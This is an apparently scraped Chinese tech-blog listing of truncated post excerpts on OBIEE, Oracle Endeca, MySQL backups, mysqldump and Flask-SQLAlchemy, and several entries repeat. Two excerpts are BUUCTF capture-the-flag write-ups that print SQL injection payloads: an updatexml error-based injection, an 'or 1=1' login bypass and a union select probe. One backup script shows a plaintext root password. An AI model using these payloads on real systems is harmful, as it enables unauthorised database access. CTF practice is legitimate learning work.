大数据
-
Sub Folders/ Nesting Folders in OBIEE 11G Answers
by Shiva Molabanti Until OBIEE 11.1.1.6.0 we were limited to nesting the folders only at 2 levels. This limitation has been fixed in OBIEE 11.1.1.6.2 with a nice feature. To nest the presentati…
-
[Recording] Drive Valuable Insight From Diverse And Unstructured Data With Oracle Endeca Information Discovery
September 25th, KPI Partners hosted an educational webinar that showed us there is significant growth of unstructured data being created by consumers and businesses alike, however unstructured forms …
-
Sub Folders/ Nesting Folders in OBIEE 11G Answers
by Shiva Molabanti Until OBIEE 11.1.1.6.0 we were limited to nesting the folders only at 2 levels. This limitation has been fixed in OBIEE 11.1.1.6.2 with a nice feature. To nest the presentati…
-
[Recording] Drive Valuable Insight From Diverse And Unstructured Data With Oracle Endeca Information Discovery
September 25th, KPI Partners hosted an educational webinar that showed us there is significant growth of unstructured data being created by consumers and businesses alike, however unstructured forms …
-
BUUCTF[极客大挑战 2019]HardSQL
1、burpsuit抓包,跑一下fuzz 发现长度为736的都被过滤掉了 2、观察error界面,猜测应该是报错注入 先爆数据库名 1 admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#、0x7e代表~ 得到数据库名geek 3、爆表…
-
【BUUCTF】[极客大挑战 2019]LoveSQL
1、打开靶机,先尝试一下万能密码 1 admin'or 1=1# 2 1234 2、尝试爆字段 1 admin'order by 1# 2 admin'order by 2# 3 admin'order by 3# 4 admin'order by 4# 3、看回显位置 1 1' union select 1,2,3# 回显在二、…
-
MySQL数据库备份脚本
#!/bin/bash # 定义备份使用的用户/密码 DbUser=root DbPasswd=NTQ34tg*@19VF # 定义备份的数据库. DbName=("zabbix" "jumpserver" "n9e" "openfire") # 定义备份目录 Path=/data # 定义备份数据保存天数 Mtime=3 T…
-
Mysql命令行导出远程mysql数据库到虚拟机本地mysql数据库中
首先了解一下mysql的相关参数 参数名 缩写 含义 --host -h 服务器IP地址 --port -P 服务器端口号 --user --u MySQL 用户名 --pasword -p MySQL 密码 --databases 指定要备份的数据库 --all-databases 备份mysql服务…
-
新版Flask-SQLAlchemy和Flask-Migrate的踩坑指南(2022.07)
一、版本环境 看了很多文章,没有写清楚环境的版本,导致解决方案根本对不上号,所以我先把本人使用的主要模块版本列出来 Flask==2.1.3 Flask-Migrate==3.1.0 Flask-Script==2.0.6 Flask-SQLAlchemy==2.5.1 本人开…
-
BUUCTF[极客大挑战 2019]HardSQL
1、burpsuit抓包,跑一下fuzz 发现长度为736的都被过滤掉了 2、观察error界面,猜测应该是报错注入 先爆数据库名 1 admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#、0x7e代表~ 得到数据库名geek 3、爆表…